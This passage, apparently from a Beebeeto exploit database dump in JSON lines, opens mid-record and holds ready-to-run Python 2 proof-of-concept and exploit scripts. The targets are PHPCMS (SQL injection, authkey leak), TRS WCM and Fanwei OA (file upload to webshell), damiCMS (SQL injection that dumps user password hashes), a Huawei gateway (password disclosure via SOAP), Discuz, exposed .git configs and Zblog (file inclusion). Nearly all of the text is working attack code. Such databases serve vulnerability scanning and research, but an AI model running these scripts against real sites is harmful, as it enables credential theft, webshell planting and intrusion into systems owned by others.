\"%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c\"\r\n \"%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f\"\r\n \"%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull\"\r\n \"%252cnull%252cnull%252cnull%252cnull%252cnull%2523\")\r\n req = urllib2.urlopen(verify_url, data)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = req.read()\r\n if \"XPATH syntax\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = args['options']['target']\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n mp = MyPoc()\r\n\r\n pprint(mp.run())\r\n", "desc": "phpcms v9\u7528\u6237\u767b\u5f55\u5904\u5b58\u5728sql\u6ce8\u5165\u6f0f\u6d1e", "app_name": "phpcms", "id": "poc-2015-0127", "layer4_protocol": null}
{"create_date": "2015-07-29 15:59:11", "name": "TRS wcm 5.2 /wcm/services/ \u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "TRS WCM 6.X GETSHELL,TRS WCM 5.X \u6f0f\u6d1e,\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0124',\r\n 'name': 'TRS wcm 5.2 /wcm/services/ \u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-07-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'trs',\r\n 'vul_version': ['5.2'],\r\n 'type': 'File Upload',\r\n 'tag': ['TRS WCM 6.X GETSHELL', 'TRS WCM 5.X \u6f0f\u6d1e', '\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e', 'jsp'],\r\n 'desc': 'TRS WCM\u7684Web Service\u63d0\u4f9b\u4e86\u5411\u670d\u52a1\u5668\u5199\u5165\u6587\u4ef6\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199jsp\u6587\u4ef6\u83b7\u53d6webshell',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2015-092138',\r\n 'http://www.wooyun.org/bugs/wooyun-2013-034315',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = '/wcm/services/trs:templateservicefacade?wsdl'\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'writeFile' in req.content and 'writeSpecFile' in req.content:\r\n 
args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "TRS WCM\u7684Web Service\u63d0\u4f9b\u4e86\u5411\u670d\u52a1\u5668\u5199\u5165\u6587\u4ef6\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199jsp\u6587\u4ef6\u83b7\u53d6webshell", "app_name": "TRS", "id": "poc-2015-0124", "layer4_protocol": null}
{"create_date": "2015-07-17 13:54:14", "name": "PHPCMS V9 /api.php Authkey \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "saviour", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "PHPCMS\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc': {\r\n 'id': 'poc-2015-0123',\r\n 'name': 'PHPCMS V9 /api.php Authkey \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e Exploit',\r\n 'author': 'Saviour',\r\n 'create_date': '2015-07-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPCMS',\r\n 'vul_version': ['V9'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['PHPCMS\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'PHPCMS V9 Authkey \u6cc4\u9732',\r\n 'references': ['N/A',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = ('/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&'\r\n 'key=authkey&cachefile=..\\..\\..\\phpsso_server\\caches\\caches_admin'\r\n '\\caches_data\\\\applist&path=admin')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n pathinfo = re.compile(r'aaaaa\\(\\[\",(.*),,,\"\\]\\)')\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n path = match[0]\r\n args['success'] = True\r\n args['poc_ret']['Authkey'] = path\r\n return args\r\n\r\n\r\n 
verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "phpcms", "id": "poc-2015-0123", "layer4_protocol": null}
{"create_date": "2015-07-03 13:38:25", "name": "Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u534e\u4e3a\u6f0f\u6d1e,Password Disclosure Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import transform_target_ip\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0120',\r\n 'name': 'Huawei Home Gateway UPnP/1.0 IGD/1.00 Password Disclosure Exploit',\r\n 'author': 'tmp',\r\n 'create_date': '2015-07-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Huawei',\r\n 'vul_version': ['UPnP/1.0', 'IGD/1.00'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u534e\u4e3a\u6f0f\u6d1e', 'Password Disclosure Vulnerability'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.exploit-db.com/exploits/37424/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # set timeout\r\n timeout = 20\r\n socket.setdefaulttimeout(timeout)\r\n target = transform_target_ip(args['options']['target'])\r\n if args['options']['verbose']:\r\n print '[*] Connecting to: ' + target\r\n # Connect the socket to the port where the server is listening\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server_address = (target, 80)\r\n sock.connect(server_address)\r\n soap = \"<?xml version=\\\"1.0\\\"?>\"\r\n soap +=\"<s:Envelope xmlns:s=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" 
s:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\"\r\n soap +=\"<s:Body>\"\r\n soap +=\"<m:GetLoginPassword xmlns:m=\\\"urn:dslforum-org:service:UserInterface:1\\\">\"\r\n soap +=\"</m:GetLoginPassword>\"\r\n soap +=\"</s:Body>\"\r\n soap +=\"</s:Envelope>\"\r\n message = \"POST /UD/?5 HTTP/1.1\\r\\n\"\r\n message += \"SOAPACTION: \\\"urn:dslforum-org:service:UserInterface:1#GetLoginPassword\\\"\\r\\n\"\r\n message += \"Content-Type: text/xml; charset=\\\"utf-8\\\"\\r\\n\"\r\n message += \"Host:\" + target + \"\\r\\n\"\r\n message += \"Content-Length:\" + str(len(soap)) +\"\\r\\n\"\r\n message += \"Expect: 100-continue\\r\\n\"\r\n message += \"Connection: Keep-Alive\\r\\n\\r\\n\"\r\n sock.send(message)\r\n data = sock.recv(1024)\r\n if args['options']['verbose']:\r\n print \"[*] Recieved : \" + data.strip()\r\n sock.send(soap)\r\n data = sock.recv(1024)\r\n data += sock.recv(1024)\r\n r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')\r\n m = r.search(data)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['password'] = m.group(1)\r\n sock.close()\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u534e\u4e3a", "id": "poc-2015-0120", "layer4_protocol": null}
{"create_date": "2015-07-01 17:58:49", "name": "\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC", "level": "\u9ad8\u5371", "batchable": 1, "author": "GurdZain", "rank": 4, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "\u6cdb\u5faeoa\u6f0f\u6d1e,/tools/SWFUpload/upload.jsp,File Upload,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0117',\r\n 'name': '\u6cdb\u5fae OA /tools/SWFUpload/upload.jsp \u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e PoC',\r\n 'author': 'gurdzain',\r\n 'create_date': '2015-07-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6cdb\u5faeoa',\r\n 'vul_version': ['*'],\r\n 'type': 'File Upload',\r\n 'tag': ['\u6cdb\u5faeoa\u6f0f\u6d1e', '/tools/SWFUpload/upload.jsp', 'File Upload', 'jsp'],\r\n 'desc': '''\r\n http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\n post:\r\n type=\"file\" name=\"test\"\r\n \u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-076547'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target_url = args['options']['target'] + \"/tools/SWFUpload/upload.jsp\"\r\n verify_url = args['options']['target'] + \"/nulltest.jsp\"\r\n files = {'test':('test.jsp', r\"\"\"<%@ page import=\"java.util.*,java.io.*\" %>\r\n <%@ page import=\"java.io.*\"%>\r\n <%\r\n String 
path=application.getRealPath(request.getRequestURI());\r\n File d=new File(path);\r\n out.println(path);\r\n %>\r\n <% out.println(\"payload=true\");%>\"\"\")}\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + target_url\r\n\r\n req = requests.get(target_url,files=files)\r\n verify_req = requests.get(verify_url)\r\n content = verify_req.content\r\n\r\n if verify_req.status_code == 200 and 'payload=true' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\npost:\r\n type=\"file\" name=\"test\"\r\n\u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002", "app_name": "Other", "id": "poc-2015-0117", "layer4_protocol": null}
{"create_date": "2015-06-28 17:01:51", "name": "\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "xyw55", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "damiCMS\u6f0f\u6d1e,ApiAction.class.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0116',\r\n 'name': '\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'xyw55',\r\n 'create_date': '2015-06-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'damiCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['damiCMS\u6f0f\u6d1e', 'ApiAction.class.php\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\r\n \u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2010-097671'],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = '''s=/api/ajax_arclist/model/article/field/md5(1)%23'''\r\n verify_url = ('%s/index.php?%s') % (url, payload)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'ca4238a0b923820dcc509a6f75849' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 
verify_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n payload = '''s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23'''\r\n verify_url = ('%s/index.php?%s') % (url, payload)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200:\r\n pattern = r'username\":\"(.*?)\",\"userpwd\":\"(.{32})\"}'\r\n m = re.findall(pattern, req.content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['user'] = []\r\n for x in m:\r\n args['poc_ret']['user'].append(x)\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002", "app_name": "\u5927\u7c73CMS", "id": "poc-2015-0116", "layer4_protocol": null}
{"create_date": "2015-06-25 21:11:56", "name": "Discuz X3.0 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "JustForeg", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0114',\r\n 'name': 'Discuz X3.0 full Path Disclosure Vulnerability POC',\r\n 'author': 'JustForeg',\r\n 'create_date': '2015-06-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['X3.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732',\r\n 'references': ['N/A', ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payloads = [\r\n '/api/addons/zendcheck.php',\r\n '/api/addons/zendcheck52.php',\r\n '/api/addons/zendcheck53.php',\r\n '/source/plugin/mobile/api/1/index.php',\r\n '/source/plugin/mobile/extends/module/dz_digest.php',\r\n '/source/plugin/mobile/extends/module/dz_newpic.php',\r\n '/source/plugin/mobile/extends/module/dz_newreply.php',\r\n '/source/plugin/mobile/extends/module/dz_newthread.php',\r\n ]\r\n args['poc_ret']['file_path'] = []\r\n pathinfo = re.compile(r' in <b>(.*)</b> on line')\r\n for payload in payloads:\r\n verify_url = args['options']['target'] + payload\r\n if 
args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(match[0])\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732", "app_name": "Discuz", "id": "poc-2015-0114", "layer4_protocol": null}
{"create_date": "2015-06-25 11:01:12", "name": "Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "pikachu", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0113',\r\n 'name': 'Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'pikachu',\r\n 'create_date': '2015-06-23',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['X2.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n 'desc': 'discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = r'/uc_server/control/admin/db.php'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] GET: ' + payload\r\n req = requests.get(verify_url)\r\n pathinfo = re.compile(r'not found in <b>(.*)</b> on line')\r\n match = pathinfo.findall(req.content)\r\n if match:\r\n path = match[0]\r\n args['success'] = True\r\n args['poc_ret']['path'] = path\r\n return args\r\n \r\n exploit = verify\r\n\r\n\r\nif __name__ == 
'__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002", "app_name": "Discuz", "id": "poc-2015-0113", "layer4_protocol": null}
{"create_date": "2015-06-21 20:38:39", "name": "Git information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "t0nyhj", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,git", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0112',\r\n 'name': 'Git information disclosure POC',\r\n 'author': 't0nyhj',\r\n 'create_date': '2015-06-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'N/A',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['information disclosure', 'git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'git'],\r\n 'desc': 'use git incorrect cause site information disclosure',\r\n 'exploit':'https://github.com/lijiejie/GitHack',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-0100762',\r\n 'http://www.beebeeto.com/pdb/poc-2014-0024/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n keyword = ['core','remote','branch']\r\n vul_url = args[\"options\"][\"target\"] + '/.git/config'\r\n if args['options']['verbose']:\r\n print \"[*] Request URL:\", vul_url\r\n resquest = urllib2.Request(vul_url)\r\n response = urllib2.urlopen(resquest)\r\n if response.getcode() != 200:\r\n args[\"success\"] = False\r\n return args\r\n content = response.read()\r\n flag = False\r\n for word in keyword:\r\n if word in content:\r\n flag = True\r\n break\r\n if flag == True:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] 
= vul_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Incorrect use of git causes site information disclosure.", "app_name": "Other", "id": "poc-2015-0112", "layer4_protocol": null}
{"create_date": "2015-06-17 14:25:20", "name": "Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e,Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0111',\r\n 'name': 'Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-06-17',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Zblog',\r\n 'vul_version': ['*'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e', 'Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002\r\n ''',\r\n 'references': ['http://0day5.com/archives/3213',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n filepath = '/zb_install/index.php'\r\n payload = 'zbloglang=../../zb_system/image/admin/none.gif%00'\r\n verify_url = args['options']['target'] + filepath\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] POST: ' + payload\r\n req = 
requests.post(verify_url, data=payload)\r\n if 'Cannot use a scalar value' in req.content and req.status_code == 500:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002", "app_name": "Z-blog", "id": "poc-2015-0111", "layer4_protocol": null}
